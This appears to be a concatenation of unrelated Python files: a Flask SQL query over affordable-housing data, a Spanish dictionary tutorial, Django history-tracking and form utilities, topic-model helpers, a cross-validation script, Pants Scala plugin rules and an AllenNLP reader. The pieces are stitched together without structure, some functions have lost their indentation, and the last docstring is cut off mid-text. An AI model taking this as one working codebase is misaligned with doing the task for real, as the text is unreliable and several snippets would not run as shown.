        ward_selects, cluster_selects, tract_selects = get_zone_facts_select_columns(engine)
        q = """
            select
              p.nlihc_id
            , p.proj_addre
            , p.proj_name
            , CONCAT(p.proj_name, ': ', p.proj_addre) as proj_name_addre
            , p.proj_units_tot
            , p.proj_units_assist_max
            , cast(p.proj_units_assist_max / p.proj_units_tot as decimal(3,2)) as percent_affordable_housing --TODO make this calculated field in projects table
            , p.hud_own_type
            , p.ward
            , p.anc
            , p.census_tract
            , p.neighborhood_cluster
            , p.neighborhood_cluster_desc
            , p.zip
            , s.portfolio
            , s.agency
            , to_char(s.poa_start, 'YYYY-MM-DD') as poa_start
            , to_char(s.poa_end, 'YYYY-MM-DD') as poa_end
            , to_char(s.poa_start_orig, 'YYYY-MM-DD') as poa_start_orig
            , s.units_assist
            , s.subsidy_id
        """
        q += ward_selects
        q += cluster_selects
        q += tract_selects
        q += """
            from project as p
            left join zone_facts as z1 on z1.zone = p.ward
            left join zone_facts as z2 on z2.zone = p.neighborhood_cluster
            left join zone_facts as z3 on z3.zone = p.census_tract
            left join subsidy as s on s.nlihc_id = p.nlihc_id
        """
        conn = engine.connect()
        proxy = conn.execute(q)
        results = [dict(x) for x in proxy.fetchall()]
        conn.close()
        output = {'objects': results}
        return jsonify(output)

    #End of the constructor returns the assembled blueprint
    return blueprint
|
# It is recommended to INDENT a dictionary literal so it is clearer to read,
# and to FINISH it with a trailing comma (,).
person = {
    'first_name': 'javier',
    'last_name': 'ramon',
    'age': 41,
    'city': 'teruel',
}

print('Person Profile:')
print('---------------')
print('First Name: {}'.format(person['first_name'].capitalize()))
print('Last Name: {}'.format(person['last_name'].capitalize()))
print('Age: {}'.format(person['age']))
print('City: {}'.format(person['city'].capitalize()))

'''
FORMAS DE RECORRER UN DICCIONARIO CON UN BUCLE FOR:
'''
# Iterate over the dictionary's KEYS.
for key in person.keys():
    print(person[key])

# Iterate over the dictionary's VALUES.
for value in person.values():
    print(value)

# Iterate over the (key, value) ITEMS of the dictionary;
# each item is a two-element TUPLE (key, value).
for key, value in person.items():
    print(value)

'''
Podemos DEFINIR una PAREJA de VARIABLES en el FOR para GUARDAR
cada uno de los VALORES del PAR CLAVE/VALOR de un DICCIONARIO
En lugar de tener que trabajar DIRECTAMENTE con la TUPLA que
DEVUELVE 'nombre_diccionario.items()'
'''
from collections import defaultdict
def findMin(nums):
    """Return the smallest positive value v present in *nums* such that
    total(nums) - 2 * prefix_sum(i) == v for some index i; -1 if none.

    Mirrors the original exactly, including its use of a defaultdict of
    prefix sums (so an empty input yields total 0 and returns -1).
    """
    prefix = defaultdict(int)
    running = 0
    for idx, value in enumerate(nums):
        running += value
        prefix[idx] = running

    best = float('inf')
    total = prefix[len(nums) - 1]
    for idx in range(len(nums)):
        candidate = total - 2 * prefix[idx]
        if candidate > 0 and candidate in nums:
            best = min(best, candidate)

    if 0 < best != float('inf'):
        return best
    return -1
# Example usage.
nums = [0,2,3]
print(findMin(nums))
from __future__ import unicode_literals
from functools import partial
from .handlers import store_initial, action_receiver, TrackHistoryModelWrapper
from django.db.models.signals import post_init, post_save, pre_delete
from .manager import TrackHistoryDescriptor
from .settings import (
TH_DEFAULT_EXCLUDE_FIELDS,
DJANGO_SAFEDELETE_INSTALLED,
pre_softdelete,
)
def track_changes(model=None, fields=(), exclude=()):
    """Class decorator that wires history tracking onto a Django model.

    Usable with or without arguments:
        @track_changes
        @track_changes(fields=("name",))

    *fields* and *exclude* are mutually exclusive; *exclude* is merged with
    TH_DEFAULT_EXCLUDE_FIELDS. Returns the (modified) model class.
    """
    if fields and exclude:
        raise AttributeError(
            "Attributes fields and exclude can not be specified together. Use only one of them."
        )
    # Called as @track_changes(...): return a decorator awaiting the model.
    if model is None:
        return partial(track_changes, fields=fields, exclude=exclude)

    # De-duplicate field names before storing them on the receivers.
    attrs = {
        "_th_fields": tuple(set(fields)),
        "_th_exclude": tuple(set(exclude + TH_DEFAULT_EXCLUDE_FIELDS)),
    }

    uid = "django-track-history-{}".format(model.__name__)

    # Snapshot initial field values whenever an instance is instantiated.
    post_init.connect(
        partial(store_initial, **attrs),
        sender=model,
        weak=False,
        dispatch_uid=uid,
    )

    # Record history on save, hard delete and (when available) soft delete;
    # dispatch_uid is unique per signal, so one uid serves them all.
    tracked_signals = [post_save, pre_delete]
    if DJANGO_SAFEDELETE_INSTALLED:
        tracked_signals.append(pre_softdelete)
    for signal in tracked_signals:
        signal.connect(
            action_receiver,
            sender=model,
            weak=False,
            dispatch_uid=uid,
        )

    # Hack model to inherit from TrackHistoryModelWrapper.
    model.__bases__ = (TrackHistoryModelWrapper,) + model.__bases__
    # Expose the history query manager on the model.
    setattr(model, "history", TrackHistoryDescriptor(model))
    return model

__all__ = ["track_changes"]
|
import numpy as np
import pandas as pd
import logging
import warnings
from pandas.core.indexes.base import Index
from typing import (
Iterable,
List,
)
import artm
from topicnet.cooking_machine import Dataset
from topicnet.cooking_machine.models import TopicModel
_logger = logging.getLogger()
# TODO: seems like method suitable for Dataset?
def get_phi_index(dataset: Dataset) -> Index:
    """Return the Phi-matrix row index (token index) a model built on
    *dataset* would have, by fitting a throwaway 1-topic model."""
    artm_model_template = artm.ARTM(num_topics=1, num_processors=1)
    artm_model_template.initialize(dictionary=dataset.get_dictionary())
    model_template = TopicModel(artm_model=artm_model_template)
    phi_template = model_template.get_phi()
    phi_index = phi_template.index
    # Free the temporary models eagerly; only the index is needed.
    del model_template
    del artm_model_template
    return phi_index
def _copy_phi(model: artm.ARTM, phi: pd.DataFrame, phi_ref: np.ndarray = None) -> np.ndarray:
    """Copy the columns of *phi* into *model*'s attached Pwt matrix, matching
    rows by token index.

    Tokens present in *phi* but missing from the model are skipped: a warning
    is issued if fewer than half are missing, otherwise RuntimeError is
    raised. Pass *phi_ref* to reuse an already-attached Pwt buffer; returns
    the (possibly newly attached) buffer.
    """
    model_wrapper = TopicModel(artm_model=model)
    base_phi_index = model_wrapper.get_phi().index
    # TODO: faster?
    source_indices = list(phi.index)
    target_indices = list()
    found_indices = list()
    not_found_indices = list()
    # More than this fraction of missing tokens is treated as an error.
    not_found_indices_fraction_threshold = 0.5

    # Map each source token to its row position in the model's Phi.
    for index in source_indices:
        try:
            target_index = base_phi_index.get_loc(index)
        except KeyError:
            not_found_indices.append(index)
        else:
            target_indices.append(target_index)
            found_indices.append(index)

    if len(not_found_indices) == 0:
        pass
    elif len(not_found_indices) < not_found_indices_fraction_threshold * len(source_indices):
        warnings.warn(
            f'There are {len(not_found_indices) / (1e-7 + len(source_indices)) * 100}% of words'
            f' (i.e. {len(not_found_indices)} words)'
            f' in the given Phi matrix'
            f' which were not found in the model\'s Phi matrix'
        )
    else:
        raise RuntimeError(
            f'Not less than {not_found_indices_fraction_threshold * 100}% of words'
            f' in the given Phi matrix with {len(source_indices)} words were not found'
            f' in the model\'s Phi matrix with {len(base_phi_index)} words!'
            f' Seems like doing initialization in such circumstances is not good'
        )

    _logger.debug(f'Attaching pwt and copying')

    # Attach (or reuse) the writable Pwt buffer and copy matched rows in.
    if phi_ref is None:
        (_, phi_ref) = model.master.attach_model(
            model=model.model_pwt
        )
    phi_ref[target_indices, :phi.shape[1]] = phi.loc[found_indices, :].values
    return phi_ref
def _safe_copy_phi(
        model: artm.ARTM,
        phi: pd.DataFrame,
        dataset: Dataset,
        small_num_fit_iterations: int = 3) -> np.ndarray:
    """Copy *phi* into *model*, optionally re-copying around a few short
    fit_offline passes so the initialization "sticks".

    With small_num_fit_iterations == 0 this is a single plain copy.
    """
    if small_num_fit_iterations == 0:
        phi_ref = _copy_phi(model, phi)
        return phi_ref

    phi_ref = None
    # TODO: small_num_fit_iterations bigger than 1 seems not working for big matrices
    for _ in range(small_num_fit_iterations):
        phi_ref = _copy_phi(model, phi, phi_ref=phi_ref)
        model.fit_offline(dataset.get_batch_vectorizer(), 1)
    return phi_ref
def _trim_vw(tokens: List[str]) -> Iterable[str]:
modality_start_symbol = '|'
for token in tokens:
if token.startswith(modality_start_symbol):
continue
if ':' not in token:
word = token
else:
word, frequency = token.split(':')
yield word
|
import enum
import re
from enum import unique
from typing import (
Any,
Callable,
Dict,
Literal,
NamedTuple,
Optional,
Sequence,
Type,
TypeVar,
Union,
cast,
get_type_hints,
)
from django import forms as django_forms
from django.forms.widgets import Widget
from django.http import HttpRequest, HttpResponse, JsonResponse
from django.template.response import TemplateResponse
from . import registry, serialization, stubs
from .fields import _GT, EnumChoiceIterator, coerce_to_enum
from .widgets import Autocomplete as Autocomplete
class EnumChoiceField(django_forms.TypedChoiceField):
    """TypedChoiceField whose choices come from a Python Enum and whose
    submitted values are coerced back to members of that enum."""

    def __init__(
        self,
        *,
        coerce: Optional[Callable[[Any], Optional[_GT]]] = None,
        empty_value: Optional[str] = "",
        enum: Optional[Type[_GT]] = None,
        choices: Optional[EnumChoiceIterator[_GT]] = None,
        required: bool = True,
        widget: Optional[Union[Widget, Type[Widget]]] = None,
        label: Optional[str] = None,
        initial: Optional[_GT] = None,
        help_text: str = "",
        error_messages: Optional[Any] = None,
        show_hidden_initial: bool = False,
        validators: Sequence[Any] = (),
        localize: bool = False,
        disabled: bool = False,
        label_suffix: Optional[Any] = None,
    ) -> None:
        """When instantiated by a model form, choices will be populated and
        enum will not, as Django strips all but a defined set of kwargs.
        And coerce will be populated by the model as well.
        When using this field directly in a form, enum will be populated and
        choices and coerce should be None."""
        if enum is not None and choices is None:
            # Direct form usage: derive choices and coercion from the enum.
            self.enum = enum
            choices = EnumChoiceIterator(enum=enum, include_blank=required)
            coerce = lambda value: coerce_to_enum(self.enum, value)
        elif enum is None and choices is not None:
            # Model-form path: Django supplies choices/coerce; recover the enum.
            self.enum = choices.enum
        else:
            # NOTE(review): assert is stripped under `python -O`; an explicit
            # raise would be a safer guard here.
            assert False, "Pass enum or choices. Not both"
        # Fails fast if the enum contains aliased (duplicate-valued) members.
        unique(self.enum)
        return super().__init__(
            coerce=coerce,
            empty_value=empty_value,
            choices=choices,
            required=required,
            widget=widget,
            label=label,
            initial=initial,
            help_text=help_text,
            error_messages=error_messages,
            show_hidden_initial=show_hidden_initial,
            validators=validators,
            localize=localize,
            disabled=disabled,
            label_suffix=label_suffix,
        )

    """
    Enum choices must be serialized to their name rather than their enum
    representation for the existing value in forms. Choices themselves are
    handled by the `choices` argument in form and model fields.
    """
    def prepare_value(self, value: Optional[enum.Enum]) -> Optional[str]:
        # Render enum members by .name; pass anything else through untouched.
        if isinstance(value, enum.Enum):
            return value.name
        return value
# Generic placeholder used by the `autocomplete` decorator below.
T = TypeVar("T")
class FormOrFormSetDescriptor(NamedTuple):
    # Form/formset prefix extracted from a prefixed field name (None when the
    # field name carried no prefix).
    prefix: Optional[str]
    # Bare field name with any form/formset prefix stripped.
    field_name: str
def get_form_or_form_set_descriptor(prefixed_name: str) -> FormOrFormSetDescriptor:
    """Split a prefixed HTML field name into its form/formset prefix and field name.

    Formset members look like ``<prefix>-<index>-<field>``; prefixed form
    fields look like ``<prefix>-<field>``; anything else is treated as an
    unprefixed field name (prefix None).
    """
    # The index must be [0-9]+ — the original single-digit pattern silently
    # mis-parsed formsets with 10 or more forms (e.g. "form-10-name").
    # Raw strings are used as is conventional for regex patterns.
    FORM_SET_REGEX = r"(.*)?(-[0-9]+-)(.*)"
    FORM_REGEX = r"(.*)?(-)(.*)"

    form_set_match = re.match(FORM_SET_REGEX, prefixed_name)
    form_match = re.match(FORM_REGEX, prefixed_name)

    if form_set_match is not None:
        return FormOrFormSetDescriptor(
            field_name=form_set_match.groups()[2], prefix=form_set_match.groups()[0]
        )
    elif form_match is not None:
        return FormOrFormSetDescriptor(
            field_name=form_match.groups()[2], prefix=form_match.groups()[0]
        )
    return FormOrFormSetDescriptor(field_name=prefixed_name, prefix=None)
def get_form_from_form_set_or_form(
    context_data: Dict[
        str, Union[django_forms.BaseForm, django_forms.formsets.BaseFormSet, object]
    ],
    descriptor: FormOrFormSetDescriptor,
) -> Optional[django_forms.BaseForm]:
    """Find the form (or a formset's empty form) whose prefix matches ``descriptor``.

    Returns ``None`` when nothing in the template context matches.
    """
    # Only the context values are inspected; the keys are irrelevant here.
    for item in context_data.values():
        if isinstance(item, django_forms.BaseForm) and item.prefix == descriptor.prefix:
            return item
        if (
            isinstance(item, django_forms.formsets.BaseFormSet)
            and item.prefix == descriptor.prefix
        ):
            # `empty_form` is a real BaseForm; the cast only narrows the static type.
            return cast(django_forms.BaseForm, item.empty_form)
    return None
def autocomplete(view_func: T) -> T:
    """View decorator that adds a JSON autocomplete endpoint to a template view.

    When the request carries ``?autocomplete=<prefixed-field-name>`` and the
    wrapped view returned a ``TemplateResponse``, the decorator looks up that
    field's form in the template context and — if the field is a
    ``ModelChoiceField`` rendered with the ``Autocomplete`` widget — answers
    with matching results as JSON instead of the rendered page.
    """
    def wrapped_view(request: HttpRequest, *args: Any, **kwargs: Any) -> HttpResponse:
        response: HttpResponse = view_func(  # type: ignore[operator]
            request, *args, **kwargs
        )
        autocomplete = request.GET.get("autocomplete", None)
        query = request.GET.get("query", "")
        # Pass the response through untouched unless autocomplete was
        # requested on a template-rendered response.
        if autocomplete is None or not isinstance(response, TemplateResponse):
            return response
        context_data = response.context_data or {}
        descriptor = get_form_or_form_set_descriptor(autocomplete)
        form = get_form_from_form_set_or_form(context_data, descriptor)
        if (
            form is not None
            and descriptor.field_name in form.fields
            and isinstance(
                form.fields[descriptor.field_name], django_forms.ModelChoiceField
            )
            and isinstance(form.fields[descriptor.field_name].widget, Autocomplete)
        ):
            autocomplete_field = form.fields[descriptor.field_name]
            to_field_name = autocomplete_field.to_field_name or "pk"
            # Cap at 50 results; "value" is what the form submits, "label" is
            # what the user sees.
            results = [
                {"value": getattr(result, to_field_name), "label": str(result)}
                for result in autocomplete_field.queryset.autocomplete(query)[:50]
            ]
            return JsonResponse({"results": results})
        return response
    return cast(T, wrapped_view)
class FormGroup:
    """Groups several forms declared as class-level type hints into one unit.

    Subclasses declare attributes like ``profile: ProfileForm`` (optionally
    ``Optional[...]``); on instantiation each declared form is constructed with
    the shared ``data`` and its attribute name as the form prefix.
    """
    # Discriminator consumed by the client-side serializer.
    tag: Literal["FormGroup"] = "FormGroup"

    def __init__(self, data: Any = None) -> None:
        hints = get_type_hints(type(self))
        without_none = {}
        for hint_name, hint in hints.items():
            if hint_name == "tag":
                continue
            # Unwrap Optional[X] (i.e. Union[X, None]) down to X so that the
            # concrete form class can be instantiated.
            if isinstance(hint, stubs._GenericAlias) and issubclass(
                hint.__args__[1], type(None)
            ):
                without_none[hint_name] = hint.__args__[0]
            else:
                without_none[hint_name] = hint
        for arg_name, arg_type in without_none.items():
            # Each member form gets its attribute name as its prefix, which is
            # what get_form_or_form_set_descriptor later relies on.
            setattr(self, arg_name, arg_type(data, prefix=arg_name))

    @property
    def errors(self) -> Any:
        """Mapping of member name -> that member form's errors."""
        collected = {}
        for arg_name in get_type_hints(self).keys():
            collected[arg_name] = getattr(self, arg_name).errors
        return collected

    def is_valid(self) -> bool:
        """True only when every member form validates."""
        return all(
            [
                getattr(self, arg_name).is_valid()
                for arg_name in get_type_hints(self).keys()
            ]
        )

    @classmethod
    def get_json_schema(Type, definitions: registry.Definitions) -> registry.Thing:
        """JSON schema for the group; `errors` is computed so it is excluded."""
        return serialization.named_tuple_schema(Type, definitions, exclude=["errors"])

    @classmethod
    def get_serialized_value(
        Type: Type["FormGroup"],
        class_or_instance: Union[Type["FormGroup"], "FormGroup"],
        schema: registry.Thing,
    ) -> registry.JSON:
        # if isinstance(class_or_instance, FormGroup):
        #     assert False, "Not yet supported"
        # Instance case: serialize the bound forms directly.
        if isinstance(class_or_instance, FormGroup):
            return {
                **serialization.serialize(
                    class_or_instance,
                    schema,
                    suppress_custom_serializer=True,
                ),
                "tag": "FormGroup",
            }
        # NOTE(review): after the early return above, class_or_instance is
        # always a class here, so the first branch of this conditional is
        # unreachable — confirm before simplifying.
        hints = (
            get_type_hints(type(class_or_instance))
            if isinstance(class_or_instance, FormGroup)
            else get_type_hints(class_or_instance)
        )
        without_none = {}
        for hint_name, hint in hints.items():
            if hint_name == "tag":
                continue
            # Same Optional-unwrapping as in __init__.
            if isinstance(hint, stubs._GenericAlias) and issubclass(
                hint.__args__[1], type(None)
            ):
                without_none[hint_name] = hint.__args__[0]
            else:
                without_none[hint_name] = hint
        return {
            **serialization.serialize(
                without_none,
                schema,
                suppress_custom_serializer=True,
            ),
            "tag": "FormGroup",
        }
|
from validator import data_validator as dv
from importlib import reload
import config
import main
import os
import pathlib
import csv
import pandas as pd
from pytorch_utils.utils import train_best_model, evaluate
# Directory (relative to ./data) that holds the spectrogram symlinks used for
# leave-one-out cross validation.
folder = 'all-spectrograms-symlinks/99.5'
cwd = os.getcwd()
spectrogram_path = os.path.join(cwd, 'data', folder)
# Use "config_crossvalidation" if doing cross validation
file = 'validator/config_crossvalidation.json'
validator_path = 'validator'
csv_file = 'weighted_results_cross_validation.csv'
# CSV accumulating one evaluation row per held-out directory.
csv_path = os.path.join(validator_path, csv_file)
# NOTE(review): `file` shadows a builtin name; `epochs` is defined here but the
# training call in new_cv hard-codes epochs=1 — confirm which is intended.
epochs = 10
def get_name(path):
    """Return ``folder/<basename>`` for ``path``, normalised through pathlib."""
    normalised = pathlib.Path(path)        # standardises separators
    base_name = os.path.basename(normalised)  # last path component only
    return os.path.join(folder, base_name)
def write_to_csv(name, noise_correct, noise_total, local_correct, local_total, total_percent_correct, epochs):
    """Append one result row to the cross-validation CSV at ``csv_path``."""
    # newline='' is required by the csv module; without it the writer inserts
    # blank lines between rows on Windows.
    with open(csv_path, 'a', newline='') as f:
        writer = csv.writer(f)
        writer.writerow([name,
                         noise_correct,
                         noise_total,
                         local_correct,
                         local_total,
                         total_percent_correct,
                         epochs])
def initialize_csv(csv_path):
    """Write the header row unless the results CSV already exists."""
    if os.path.exists(csv_path):
        return
    write_to_csv('Name',
                 'Amount Correct Noise',
                 'Amount Total Noise',
                 'Amount Correct Local',
                 'Amount Total Local',
                 'Total Percent Correct',
                 'Epochs')
def new_cv(skip_existing=True):
    """Leave-one-directory-out cross validation over the spectrogram folders.

    For each directory: train on every other directory, evaluate on the
    held-out one, and append the result to the CSV.  Directories already
    recorded in the CSV are skipped when ``skip_existing`` is True.
    """
    import copy
    configuration = dv.read_config(file)
    configuration['train']['path'] = folder
    configuration['test']['path'] = folder
    dirs = list(map(os.path.basename,
                    map(get_name, dv.get_paths(folder))))
    initialize_csv(csv_path)
    if skip_existing:
        df = pd.read_csv(csv_path)
        names = list(map(get_name, df['Name'].tolist()))
        print(f"Skipping {len(names)} directories already in CSV")
        dirs = list(set(dirs).difference(set(names)))
    for i, directory in enumerate(dirs):  # renamed: `dir` shadows a builtin
        print("\n", "-" * 20)
        print(f"Progress: {i}/{len(dirs)}")
        print("-" * 20, "\n")
        net, optimizer, criterion = main.create_model()
        # Train sees only `directory`; test sees everything except it.
        ignore_test = copy.copy(dirs)
        ignore_test.remove(directory)
        configuration['train']['ignore'] = [directory]
        configuration['test']['ignore'] = ignore_test
        # NOTE(review): the original referenced an undefined name `model`; the
        # transformations are assumed to live in `main` next to create_model /
        # create_dataset — confirm against main.py.
        dataset_train = main.create_dataset(configuration, main.transformations['train'], train=True)
        dataset_test = main.create_dataset(configuration, main.transformations['test'], train=False)
        # Create a final test loader with unseen data by holding out 10% of
        # the training data.
        dataset_final = copy.deepcopy(dataset_train)
        # Slice indices must be ints — len(...) * .1 is a float.
        ntest_samples = int(len(dataset_train) * .1)
        del dataset_final.file_paths[ntest_samples:]
        del dataset_train.file_paths[:ntest_samples]
        # NOTE(review): verify_dataset_integrity / create_loader were undefined
        # in the original; assumed to come from `main` — confirm.
        assert main.verify_dataset_integrity(dataset_train, dataset_test)
        assert main.verify_dataset_integrity(dataset_train, dataset_final)
        weigh_classes = dict(enumerate(configuration['weigh_classes']))
        train_loader = main.create_loader(dataset_train, train=True, weigh_classes=weigh_classes)
        test_loader = main.create_loader(dataset_test, train=False)
        final_test_loader = main.create_loader(dataset_final, train=False)
        try:
            print("Evaluating Net on " + directory)
            # Positional arguments must precede keyword arguments — the
            # original call was a SyntaxError.  NOTE(review): `writer` was
            # undefined; None disables logging — confirm train_best_model's
            # signature and whether epochs should be 1 or the module-level 10.
            evaluator, best_epoch = train_best_model(1,
                                                     train_loader, test_loader,
                                                     net, optimizer, criterion, net,
                                                     writer=None,
                                                     write=False,
                                                     yield_every=50_000)
            # NOTE(review): `loader` / `copy_net` were undefined; evaluating on
            # the held-out final loader without copying the net — confirm.
            evaluator = evaluate(net, final_test_loader, copy_net=False)
            print('\n', evaluator, '\n')
            write_to_csv(directory,
                         evaluator.class_details(0).amount_correct,
                         evaluator.class_details(0).amount_total,
                         evaluator.class_details(1).amount_correct,
                         evaluator.class_details(1).amount_total,
                         str(evaluator.total_percent_correct()),
                         evaluator.iteration,
                         )
        except Exception as e:
            print("Failed to run neural net: ", e)
            raise
if __name__ == '__main__':
    # `run_cv` does not exist anywhere in this module — the entry point is
    # `new_cv`.  The unused `import glob` is dropped as well.
    new_cv()
# import argv from sys module
from sys import argv

# unpack argv to two variables: the script name and the file to read
script, filename = argv

# Open 'filename' (given on the command line) and print its contents.
# A `with` block guarantees the file is closed even if reading fails
# (the original opened it and closed it manually).
with open(filename) as file_object:
    # Python 3: print is a function; %r keeps the quoted-repr formatting.
    print("Here's your file %r: " % filename)
    print(file_object.read())

# Require input from the user for the next file to be opened, read, and
# printed (assumedly the same file).  Python 3 renamed raw_input -> input.
print("Type the filename again:")
filename_again = input("> ")

# Open and print the second file, again closing it automatically.
with open(filename_again) as file_object_again:
    print(file_object_again.read())
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from typing import Iterable, Iterator
from pants.backend.scala.subsystems.scalac import Scalac
from pants.backend.scala.target_types import (
ScalaConsumedPluginNamesField,
ScalacPluginArtifactField,
ScalacPluginNameField,
)
from pants.build_graph.address import Address, AddressInput
from pants.engine.addresses import Addresses
from pants.engine.internals.native_engine import Digest, MergeDigests
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import AllTargets, CoarsenedTargets, Target, Targets
from pants.jvm.compile import ClasspathEntry, FallibleClasspathEntry
from pants.jvm.goals import lockfile
from pants.jvm.resolve.coursier_fetch import CoursierFetchRequest
from pants.jvm.resolve.jvm_tool import rules as jvm_tool_rules
from pants.jvm.resolve.key import CoursierResolveKey
from pants.jvm.subsystems import JvmSubsystem
from pants.jvm.target_types import JvmResolveField
from pants.util.ordered_set import OrderedSet
@dataclass(frozen=True)
class ScalaPluginsForTargetWithoutResolveRequest:
    # Request for the scalac plugins of `target`; the resolve name is derived
    # from the target's JvmResolveField by a separate rule.
    target: Target
@dataclass(frozen=True)
class ScalaPluginsForTargetRequest:
    # Request for the scalac plugins of `target` within a known JVM resolve.
    target: Target
    resolve_name: str
@dataclass(frozen=True)
class ScalaPluginTargetsForTarget:
    # Plugin-definition targets and their corresponding jvm_artifact targets,
    # paired positionally.
    plugins: Targets
    artifacts: Targets
@dataclass(frozen=True)
class ScalaPluginsRequest:
    """Request to fetch the classpath for a set of plugin/artifact targets."""

    plugins: Targets
    artifacts: Targets
    resolve: CoursierResolveKey

    @classmethod
    def from_target_plugins(
        cls,
        seq: Iterable[ScalaPluginTargetsForTarget],
        resolve: CoursierResolveKey,
    ) -> ScalaPluginsRequest:
        """Union several per-target plugin results into one deduplicated request."""
        plugin_set: OrderedSet[Target] = OrderedSet()
        artifact_set: OrderedSet[Target] = OrderedSet()

        for per_target in seq:
            plugin_set.update(per_target.plugins)
            artifact_set.update(per_target.artifacts)

        return cls(Targets(plugin_set), Targets(artifact_set), resolve)
@dataclass(frozen=True)
class ScalaPlugins:
    """Resolved scalac plugins: their names plus the fetched classpath."""

    names: tuple[str, ...]
    classpath: ClasspathEntry

    def args(self, prefix: str | None = None) -> Iterator[str]:
        """Yield the scalac options that enable and require these plugins."""
        path_prefix = "" if not prefix else f"{prefix}/"
        for plugin_file in self.classpath.filenames:
            yield f"-Xplugin:{path_prefix}{plugin_file}"
        for plugin_name in self.names:
            yield f"-Xplugin-require:{plugin_name}"
class AllScalaPluginTargets(Targets):
    # Marker collection: every target in the repo that defines a scalac plugin.
    pass
@rule
async def all_scala_plugin_targets(targets: AllTargets) -> AllScalaPluginTargets:
    """Collect every target carrying both scalac-plugin fields (artifact + name)."""
    return AllScalaPluginTargets(
        tgt for tgt in targets if tgt.has_fields((ScalacPluginArtifactField, ScalacPluginNameField))
    )
@rule
async def add_resolve_name_to_plugin_request(
    request: ScalaPluginsForTargetWithoutResolveRequest, jvm: JvmSubsystem
) -> ScalaPluginsForTargetRequest:
    """Upgrade a resolve-less request by reading the target's normalized resolve."""
    return ScalaPluginsForTargetRequest(
        request.target, request.target[JvmResolveField].normalized_value(jvm)
    )
@rule
async def resolve_scala_plugins_for_target(
    request: ScalaPluginsForTargetRequest,
    all_scala_plugins: AllScalaPluginTargets,
    jvm: JvmSubsystem,
    scalac: Scalac,
) -> ScalaPluginTargetsForTarget:
    """Find the plugin targets (and their artifacts) a target consumes in its resolve.

    Raises if a requested plugin name has no artifact in the target's resolve.
    """
    target = request.target
    resolve = request.resolve_name
    plugin_names = target.get(ScalaConsumedPluginNamesField).value
    if plugin_names is None:
        # No explicit field value: fall back to the per-resolve defaults
        # configured on the scalac subsystem.
        plugin_names_by_resolve = scalac.parsed_default_plugins()
        plugin_names = tuple(plugin_names_by_resolve.get(resolve, ()))
    candidate_plugins = []
    artifact_address_gets = []
    for plugin in all_scala_plugins:
        if _plugin_name(plugin) not in plugin_names:
            continue
        candidate_plugins.append(plugin)
        artifact_field = plugin[ScalacPluginArtifactField]
        # The artifact field holds an address string relative to the plugin
        # target's directory.
        address_input = AddressInput.parse(
            artifact_field.value,
            relative_to=target.address.spec_path,
            description_of_origin=(
                f"the `{artifact_field.alias}` field from the target {artifact_field.address}"
            ),
        )
        artifact_address_gets.append(Get(Address, AddressInput, address_input))
    artifact_addresses = await MultiGet(artifact_address_gets)
    candidate_artifacts = await Get(Targets, Addresses(artifact_addresses))
    plugins: dict[str, tuple[Target, Target]] = {}  # Maps plugin name to relevant JVM artifact
    # candidate_plugins and candidate_artifacts are index-aligned by
    # construction of the MultiGet above.
    for plugin, artifact in zip(candidate_plugins, candidate_artifacts):
        if artifact[JvmResolveField].normalized_value(jvm) != resolve:
            continue
        plugins[_plugin_name(plugin)] = (plugin, artifact)
    for plugin_name in plugin_names:
        if plugin_name not in plugins:
            raise Exception(
                f"Could not find Scala plugin `{plugin_name}` in resolve `{resolve}` "
                f"for target {request.target}"
            )
    plugin_targets, artifact_targets = zip(*plugins.values()) if plugins else ((), ())
    return ScalaPluginTargetsForTarget(Targets(plugin_targets), Targets(artifact_targets))
def _plugin_name(target: Target) -> str:
    # Explicit plugin name when set; otherwise fall back to the address name.
    return target[ScalacPluginNameField].value or target.address.target_name
@rule
async def fetch_plugins(request: ScalaPluginsRequest) -> ScalaPlugins:
    """Fetch the jars for the requested plugins and merge them into one classpath."""
    # Fetch all the artifacts
    coarsened_targets = await Get(
        CoarsenedTargets, Addresses(target.address for target in request.artifacts)
    )
    fallible_artifacts = await MultiGet(
        Get(
            FallibleClasspathEntry,
            CoursierFetchRequest(ct, resolve=request.resolve),
        )
        for ct in coarsened_targets
    )
    # if_all_succeeded returns None when any fetch failed; surface the failures.
    artifacts = FallibleClasspathEntry.if_all_succeeded(fallible_artifacts)
    if artifacts is None:
        failed = [i for i in fallible_artifacts if i.exit_code != 0]
        raise Exception(f"Fetching local scala plugins failed: {failed}")
    merged_classpath_digest = await Get(Digest, MergeDigests(i.digest for i in artifacts))
    merged = ClasspathEntry.merge(merged_classpath_digest, artifacts)
    names = tuple(_plugin_name(target) for target in request.plugins)
    return ScalaPlugins(names=names, classpath=merged)
def rules():
    """Rules for scalac-plugin resolution, plus the tool/lockfile support they need."""
    return tuple(collect_rules()) + tuple(jvm_tool_rules()) + tuple(lockfile.rules())
|
from django.contrib import admin
from stud.models import AddStudent
# Register your models here.
# Make AddStudent manageable through the Django admin site.
admin.site.register(AddStudent)
|
# inspired from classification_tsv, an example from the allennlp repository
from typing import Dict, Iterable, List
import logging
from overrides import overrides
import itertools
import re
from allennlp.common.file_utils import cached_path
from allennlp.data import DatasetReader, Instance
from allennlp.data.fields import LabelField, TextField, SequenceLabelField, ArrayField
from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer
from allennlp.data.tokenizers import Token, Tokenizer, WhitespaceTokenizer
import pandas as pd
logger = logging.getLogger(__name__)
def _is_divider(line: str) -> bool:
empty_line = line.strip() == ""
if empty_line:
return True
else:
first_token = line.split()[0]
if first_token == "-DOCSTART-":
return True
else:
return False
@DatasetReader.register('semeval-reader')
class SemevalReader(DatasetReader):
    """First-draft SemEval reader.

    NOTE(review): `_read` below is broken (it yields undefined names) — the
    working reader is SemevalReader2 further down this file.
    """
    def __init__(self,
                 tokenizer: Tokenizer = None,
                 token_indexers: Dict[str, TokenIndexer] = None,
                 max_tokens: int = None,
                 **kwargs):
        super().__init__(**kwargs)
        # Defaults: whitespace tokenization and single-id token indexing.
        self.tokenizer = tokenizer or WhitespaceTokenizer()
        self.token_indexers = token_indexers or {'tokens': SingleIdTokenIndexer()}
        self.max_tokens = max_tokens
    def text_to_instance(self,
                         tokens: List[Token],
                         lang: List[str] = None,
                         tid: int = None,
                         sentiment: int = None) -> Instance:
        '''
        Build an Instance from a tokenized tweet.

        tokens: the tweet's tokens; lang: per-token language markers;
        tid: tweet id; sentiment: the gold label.
        Modeled on the allennlp conll2003 dataset reader.
